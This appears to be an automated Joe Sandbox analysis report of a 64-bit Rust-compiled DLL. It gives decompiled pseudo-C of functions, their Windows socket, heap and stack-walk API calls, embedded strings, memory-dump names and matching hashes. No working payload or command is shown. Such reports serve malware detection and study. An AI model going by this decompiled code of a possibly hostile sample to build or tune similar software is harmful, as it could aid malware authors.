				_t42 =  *((intOrPtr*)(_t37 + 0x10));
				if (_t21 < 0) goto 0xf3044036;
				_t25 =  *((intOrPtr*)(_t37 + 0x10)) + 3 >> 2;
				E000007FE7FEF306239E(_t25, _t25 + _t25 * 2);
				_v96 = _t25;
				_v88 = _t37;
				_v80 = 0;
				if (_t21 < 0) goto 0xf304404b;
				_v136 =  *_t37;
				_t40 =  &_v96;
				r8d = 0; // executed
				E000007FE7FEF3075EB0(_t40, (_t42 + 7 >> 3) + (_t42 + 7 >> 3) + ((_t42 + 7 >> 3) + (_t42 + 7 >> 3)) * 2); // executed
				_t29 =  *_t40;
				_v128 = _t29;
				if (_t29 - 5 > 0) goto 0xf3043392;
				goto __rax;
			}

0x7fef30432ac
0x7fef30432b7
0x7fef30432c3
0x7fef30432cb
0x7fef30432d0
0x7fef30432d5
0x7fef30432da
0x7fef30432ea
0x7fef30432f3
0x7fef304330a
0x7fef3043312
0x7fef3043315
0x7fef304331a
0x7fef304331d
0x7fef304332f
0x7fef304333f

Strings

decoded length calculation overflow, xrefs: 000007FEF3044036
Overflow when calculating number of chunks in input. lib.rs\src\decode.rs, xrefs: 000007FEF304404B

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: Overflow when calculating number of chunks in input. lib.rs\src\decode.rs$decoded length calculation overflow
API String ID: 0-3332307346
Opcode ID: e3d1a8f66001f1f11d5d5bcb397c19fcc48d14ee39478deee0f11d7dbcae3677
Instruction ID: cecc0b9c5f12dfd60969285f93415aa03aa11deeec0d30855c2823001bd554e7
Opcode Fuzzy Hash: e3d1a8f66001f1f11d5d5bcb397c19fcc48d14ee39478deee0f11d7dbcae3677
Instruction Fuzzy Hash: 7A720872F1D6D28AE6A04755E0143796ED3A341790F88A173EAAD037E5D63DEE72F200

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30FE9AA Relevance: 1.6, Strings: 1, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E000007FE7FEF30FE9AA(void* __eflags, void* __rcx, void* __rdx) {
				void* _t1;
				void* _t6;
				void* _t7;

				_t6 = __rdx;
				_t1 = E000007FE7FEF3069079(__eflags, __rcx, __rdx, _t7); // executed
				if (_t6 != 0x1) goto 0xf30fe9c7;
				return _t1;
			}

0x7fef30fe9aa
0x7fef30fe9ae
0x7fef30fe9c0
0x7fef30fe9c6

Strings

bad EarlyData state, xrefs: 000007FEF30FEBAB

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: bad EarlyData state
API String ID: 0-4224042464
Opcode ID: a1894e7a3c6ac3c83fab1b280e764a8ff62f629c9bdce936b9b272fc11af901d
Instruction ID: 515bcb2b57cabe9f3193441935b0b1e98736d31ea29164709e50edc8231b46fe
Opcode Fuzzy Hash: a1894e7a3c6ac3c83fab1b280e764a8ff62f629c9bdce936b9b272fc11af901d
Instruction Fuzzy Hash: 00E1D17AA09B8585EE54CB25E0053BA63A2F794BD4F448232DE9E037A5EF3CE195D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30428BC Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 205
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E000007FE7FEF30428BC(void* __eflags, void* __rcx) {
				void* _t3;

				asm("lock dec eax");
				if (__eflags != 0) goto 0xf30428d5;
				E000007FE7FEF30A7B85();
				asm("lock dec eax");
				if (__eflags != 0) goto 0xf30428ed;
				goto 0xf30a7c08;
				return _t3;
			}

0x7fef30428c7
0x7fef30428cb
0x7fef30428d0
0x7fef30428d9
0x7fef30428dd
0x7fef30428e8
0x7fef30428f3

APIs

HeapFree.KERNEL32 ref: 000007FEF30A7CC0
HeapFree.KERNEL32 ref: 000007FEF30A7CFC

Part of subcall function 000007FEF30A7B85: HeapFree.KERNEL32 ref: 000007FEF30A7BB6

Strings

assertion failed: mid <= self.len(), xrefs: 000007FEF30A7D1C

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: assertion failed: mid <= self.len()
API String ID: 3298025750-1381781290
Opcode ID: e6f6d291ddc57709fb99d71074b713fe74106d3f1f09e33d737252980ca6007d
Instruction ID: 2e79751c95538c6a5d9c74357cf6d7cbcdf926bca346eb6d77e204b2066d1d2b
Opcode Fuzzy Hash: e6f6d291ddc57709fb99d71074b713fe74106d3f1f09e33d737252980ca6007d
Instruction Fuzzy Hash: A8817076A05A4185EA91DF66E4443B923A2E788BB4F45C637CE6D073E4DE3CD446D340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A2F00 Relevance: 9.1, APIs: 6, Instructions: 62
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 000007FEF30A2F36
WSAGetLastError.WS2_32 ref: 000007FEF30A2F4F
WSASocketW.WS2_32 ref: 000007FEF30A2F80
SetHandleInformation.KERNEL32 ref: 000007FEF30A2F9A
WSAGetLastError.WS2_32 ref: 000007FEF30A2FAA
GetLastError.KERNEL32 ref: 000007FEF30A2FCA

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLast$Socket$HandleInformation
String ID:
API String ID: 91593116-0
Opcode ID: 7908b1333102cffc3f63b1cf0e9436736770e45b538d0bd7c526de4f4ef50f59
Instruction ID: de3b36afc411e2e5569d3cf1d19d718df7cfc9df540979e3fafca0140f2188d1
Opcode Fuzzy Hash: 7908b1333102cffc3f63b1cf0e9436736770e45b538d0bd7c526de4f4ef50f59
Instruction Fuzzy Hash: 2021D471A086438AFBB04B28F40472A62D6E7847B0F148331EAAD46FF4DFBD9485A700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3061D6A Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 000007FEF3061EE6
CloseHandle.KERNEL32 ref: 000007FEF306204D

Strings

use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 000007FEF3062096, 000007FEF30620B0
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF3062117, 000007FEF3062195

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: CloseHandle
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$use of std::thread::current() is not possible after the thread's local data has been destroyed
API String ID: 2962429428-2691142163
Opcode ID: d9c666f18af62d1c538ef53ca08f96fa7cf04a0bdb215674fd0efcb4815470f7
Instruction ID: b57918012ca9a0062ff689bfceff2770a2269959b1852c0be4d010b074274bfa
Opcode Fuzzy Hash: d9c666f18af62d1c538ef53ca08f96fa7cf04a0bdb215674fd0efcb4815470f7
Instruction Fuzzy Hash: DCD17032A09A4298EB958B25D8503B933E6E748BA4F644233DE6D077F5DF3CE552E340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BB020 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E000007FE7FEF30BB020() {
				long long _v288;
				long long _v296;
				long long _v528;
				intOrPtr _v536;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				long long _v616;
				long long _t24;
				long long _t31;
				long long _t32;
				void* _t36;

				_v592 = _t24;
				_v576 = _t31;
				_v568 = _t32;
				_v616 = 1;
				asm("xorps xmm0, xmm0");
				asm("movups [eax+0x8], xmm0");
				r15d = 0x19001;
				_v584 = _t24;
				if (_t36 == 0) goto 0xf30bb0f3;
				E000007FE7FEF30A8270(); // executed
				if (_v536 != 0) goto 0xf30bb102;
				_v288 = _v528;
				_v296 = 0;
				goto __rax;
			}

0x7fef30bb036
0x7fef30bb03b
0x7fef30bb040
0x7fef30bb04a
0x7fef30bb051
0x7fef30bb054
0x7fef30bb058
0x7fef30bb074
0x7fef30bb07c
0x7fef30bb084
0x7fef30bb096
0x7fef30bb098
0x7fef30bb0a0
0x7fef30bb0b8

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30BB0F5
host, xrefs: 000007FEF30BB02B
Unexpected EOFHeader field didn't end with \n: , xrefs: 000007FEF30BB3D3

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: Unexpected EOFHeader field didn't end with \n: $called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$host
API String ID: 0-939349963
Opcode ID: 01c1f9d342077fb2b7111b132f3c0efb1c964536fbdc92c17b24839178be6d0c
Instruction ID: fbfacb89b4a7522f740d41aa7ddca9c62af2a60ae2a56670a4ce2d1511e01668
Opcode Fuzzy Hash: 01c1f9d342077fb2b7111b132f3c0efb1c964536fbdc92c17b24839178be6d0c
Instruction Fuzzy Hash: 5191B832A09B418AEAA1CB15E5543BAB3E2F784794F548223DE9D43BB4EF7CE145D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A3150 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 000007FEF30A31E6
WSAGetLastError.WS2_32 ref: 000007FEF30A31F5

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID:
API String ID: 1729277954-0
Opcode ID: bbd73875a413adf9509e5712977f39865928e48c5551ef4bd7f3f188dbf082d2
Instruction ID: 6728e390fd8e8b8e7187170d82746c9a683dd3cfb8b084f1ad1e53ade1fb6956
Opcode Fuzzy Hash: bbd73875a413adf9509e5712977f39865928e48c5551ef4bd7f3f188dbf082d2
Instruction Fuzzy Hash: E50126B2F185464AEFF84BA9F901F6446D257603D4F50A233E92D46BF8D63D96049700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A3080 Relevance: 3.0, APIs: 2, Instructions: 48
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 000007FEF30A3116
WSAGetLastError.WS2_32 ref: 000007FEF30A3125

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID:
API String ID: 1729277954-0
Opcode ID: c798a2efd2d7abf5cd8d9e1d1fb2d6e0e24be7f9dda9b9dced1323e5f53913e2
Instruction ID: 0e12ea4e49bd1d231baaebdcfb20736ad06799dc643ce0b183400b8d43fe7027
Opcode Fuzzy Hash: c798a2efd2d7abf5cd8d9e1d1fb2d6e0e24be7f9dda9b9dced1323e5f53913e2
Instruction Fuzzy Hash: 340126B2F185864AFFF84BA9F502F7442E257603D4F90A233E91E4ABF4C63E9504A700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A3830 Relevance: 3.0, APIs: 2, Instructions: 31networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 000007FEF30A3855
WSAGetLastError.WS2_32 ref: 000007FEF30A386F

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ErrorLastrecv
String ID:
API String ID: 2514157807-0
Opcode ID: d9f723abfd93fb87106572e71260837782e3593ac49f1a038e55675840c28a32
Instruction ID: 790ef959a16c235eb2688edc27533476906fd30d752b6a8196a27104b7db88ea
Opcode Fuzzy Hash: d9f723abfd93fb87106572e71260837782e3593ac49f1a038e55675840c28a32
Instruction Fuzzy Hash: BDF09632E0879286FBB44B66F48437862D197557A0F208331DAFD477E0DB3C64D15300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3068F93 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF3043271), ref: 000007FEF3068FC5

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 833bf279e8d04f60213a38e248847f4e434587af01bd564da4016917d60715eb
Instruction ID: 0eaf4133fd5aad610c9c1b1f65623babeef67a1e89261ee0e4029c9af7862836
Opcode Fuzzy Hash: 833bf279e8d04f60213a38e248847f4e434587af01bd564da4016917d60715eb
Instruction Fuzzy Hash: 18019B32909B428AF6F88B56B50477D61E7B748780F2884365B9E477A4DF7CE480B300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A7AF6 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?,?,?,000007FEF30A7FFE,?,?,?,?,?,?,?,?,000007FEF30A7CA9), ref: 000007FEF30A7B05

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 3cf5418d465980b86bfa7012135180159463872b7b40c8d58484368323900a60
Instruction ID: 2c028619e0d5d7d3e9eca58c82aaafdd3429285d12125c38c44a64ebb7a1a305
Opcode Fuzzy Hash: 3cf5418d465980b86bfa7012135180159463872b7b40c8d58484368323900a60
Instruction Fuzzy Hash: BBE03936A04A81C1E7588B56F4883AD63A2E388B90F41C036CA5D077B0CF3CD8C2D380

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A3B00 Relevance: 1.5, APIs: 1, Instructions: 2COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 000007FEF30A3B04

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3d5b0fb8d27a8bddde6b96de29e3cca00ed700869f313755a84e1351a90771a6
Instruction ID: 8185e49405b600df6ceea114ddc9fd31f355cb99e7723172c6aa6f55220c7bbc
Opcode Fuzzy Hash: 3d5b0fb8d27a8bddde6b96de29e3cca00ed700869f313755a84e1351a90771a6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000007FEF309CDD0 Relevance: 30.3, APIs: 14, Strings: 3, Instructions: 533memorylibraryloaderCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000007FEF309CEC4
HeapFree.KERNEL32 ref: 000007FEF309CEE1
AcquireSRWLockExclusive.KERNEL32 ref: 000007FEF309CF05
GetCurrentProcess.KERNEL32 ref: 000007FEF309CF45
GetCurrentThread.KERNEL32 ref: 000007FEF309CF52
RtlCaptureContext.KERNEL32 ref: 000007FEF309CF75
GetCurrentProcess.KERNEL32 ref: 000007FEF309CFCA
GetProcAddress.KERNEL32 ref: 000007FEF309CFF8
RtlLookupFunctionEntry.KERNEL32 ref: 000007FEF309D223
ReleaseSRWLockExclusive.KERNEL32 ref: 000007FEF309D310
HeapFree.KERNEL32 ref: 000007FEF309D38C

Strings

StackWalkEx, xrefs: 000007FEF309CFF1
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF309D793
StackWalk64, xrefs: 000007FEF309D616

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: CurrentFreeHeap$ExclusiveLockProcess$AcquireAddressCaptureContextEntryFunctionLookupProcReleaseThread
String ID: StackWalk64$StackWalkEx$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 1197389921-3291224968
Opcode ID: 7cb42a3c267727a3fd304375cd0c6a32274f89794b41429698bd8d8713e63f34
Instruction ID: 19d76f0b99035f35b33046478f09e9c0838ecde567dc5619d1c736d7619d815c
Opcode Fuzzy Hash: 7cb42a3c267727a3fd304375cd0c6a32274f89794b41429698bd8d8713e63f34
Instruction Fuzzy Hash: 3C423132E1ABC18DE7B08F20D9443FA33A2F355358F455126DA8D07BA9EF79A295D700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30BE068 Relevance: 21.7, APIs: 11, Strings: 3, Instructions: 690
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 49%

			E000007FE7FEF30BE068(void* __ecx, signed char __edx, void* __edi, long long __rcx, char* __rdx, void* __r8) {
				signed int _t169;
				signed int _t175;
				signed char _t189;
				signed char _t191;
				signed int _t211;
				signed int _t216;
				signed int _t221;
				void* _t246;
				long long _t253;
				void* _t268;
				void* _t270;
				char* _t275;
				long long _t277;
				long long _t284;
				intOrPtr* _t294;
				char* _t296;
				signed long long _t298;
				long long _t299;
				signed char* _t300;
				long long _t330;
				long long _t336;
				signed long long _t337;
				intOrPtr* _t338;
				void* _t339;
				char* _t343;
				long long _t347;
				intOrPtr _t348;
				long long _t349;
				long long _t355;
				long long _t356;
				long long* _t358;
				signed long long _t359;
				void* _t363;
				intOrPtr _t365;
				long long _t366;
				void* _t368;
				void* _t384;
				void* _t385;
				long long _t388;
				intOrPtr* _t392;
				intOrPtr* _t394;
				signed long long _t405;
				signed long long _t406;
				char* _t409;

				_t191 = __edx;
				if (__r8 == 0) goto 0xf30be0e4;
				if ( *__rdx != 0x5b) goto 0xf30be0e4;
				if ( *((char*)(__rdx + __r8 - 1)) != 0x5d) goto 0xf30be26b;
				if (__r8 - 2 < 0) goto 0xf30beb18;
				if ( *((char*)(__rdx + 1)) - 0xbf <= 0) goto 0xf30beb18;
				_t355 = __rdx + 1;
				_t363 = __r8 + 0xfffffffe;
				_t343 = _t368 + 0x90;
				_t330 = _t355;
				E000007FE7FEF30BEB83(_t343, _t330, _t363, _t384, _t385);
				if ( *_t343 == 0) goto 0xf30be275;
				 *((char*)(__rcx + 1)) =  *((intOrPtr*)(_t368 + 0x91));
				goto 0xf30be283;
				 *((long long*)(_t368 + 0x50)) = __rcx;
				_t406 = _t368 + 0x58;
				 *_t406 = _t355;
				 *((long long*)(_t406 + 8)) = _t355 + _t363;
				_t275 =  *((intOrPtr*)(_t368 + 0x58));
				if (_t275 ==  *((intOrPtr*)(_t368 + 0x60))) goto 0xf30be2f1;
				if ( *_t275 == 0x25) goto 0xf30be116;
				goto 0xf30be103;
				_t277 = _t275 + 2;
				 *((long long*)(_t368 + 0x58)) = _t277;
				E000007FE7FEF3062320(_t277, _t406);
				if (1 == 0) goto 0xf30be0f9;
				_t347 =  *((intOrPtr*)(_t368 + 0x58)) + _t363 -  *((intOrPtr*)(_t368 + 0x60)) + 0xfffffffd;
				if (_t347 - _t363 > 0) goto 0xf30beb55;
				E000007FE7FEF306239E(_t277, _t347);
				 *((long long*)(_t368 + 0x90)) = _t277;
				 *((long long*)(_t368 + 0x98)) = _t330;
				E000007FE7FEF30F1E10();
				 *((long long*)(_t368 + 0xa0)) = _t347;
				if (_t347 != _t330) goto 0xf30be19a;
				_t394 = _t368 + 0x90;
				E000007FE7FEF30A62B2(_t347 - _t330, _t394, _t347);
				_t348 =  *((intOrPtr*)(_t394 + 0x10));
				 *((char*)( *_t394 + _t348)) = _t191;
				_t349 = _t348 + 1;
				 *((long long*)(_t368 + 0xa0)) = _t349;
				_t294 =  *((intOrPtr*)(_t368 + 0x58));
				_t388 =  *((intOrPtr*)(_t368 + 0x60));
				 *((long long*)(_t368 + 0xe8)) = _t388;
				if (_t294 == _t388) goto 0xf30be28a;
				 *((long long*)(_t368 + 0xe0)) = _t294 + 1;
				r14b =  *_t294;
				if (r14b != 0x25) goto 0xf30be1f8;
				E000007FE7FEF3062320(_t294 + 1, _t368 + 0xe0);
				r14d = _t191 & 0x000000ff;
				r14d =  ==  ? 0x25 : r14d;
				if (_t349 ==  *((intOrPtr*)(_t368 + 0x98))) goto 0xf30be22b;
				 *((intOrPtr*)( *((intOrPtr*)(_t368 + 0x90)) + _t349)) = r14b;
				 *((long long*)(_t368 + 0xa0)) = _t349 + 1;
				goto 0xf30be1c3;
				_t296 =  *((intOrPtr*)(_t368 + 0xe0));
				E000007FE7FEF30FE8E4(_t349 -  *((intOrPtr*)(_t368 + 0x98)), _t368 + 0x90, _t349 + 1);
				goto 0xf30be212;
				 *_t296 = 0x403;
				goto 0xf30be6f5;
				asm("movups xmm0, [esp+0x91]");
				asm("movups [ebx+0x1], xmm0");
				 *_t296 = 2;
				goto 0xf30be6f5;
				if ( *((intOrPtr*)(_t368 + 0x90)) == 0) goto 0xf30be2f1;
				_t356 = _t368 + 0x90;
				E000007FE7FEF30515F0( *((intOrPtr*)(_t368 + 0xe8)) - _t296 + 2, _t356,  *((intOrPtr*)(_t368 + 0x90)), _t349 + 1);
				if ( *_t356 == 0) goto 0xf30be9b7;
				_t284 =  *((intOrPtr*)(_t368 + 0xa0));
				 *((long long*)(_t368 + 0x80)) = _t284;
				asm("movups xmm0, [esp+0x90]");
				asm("movaps [esp+0x70], xmm0");
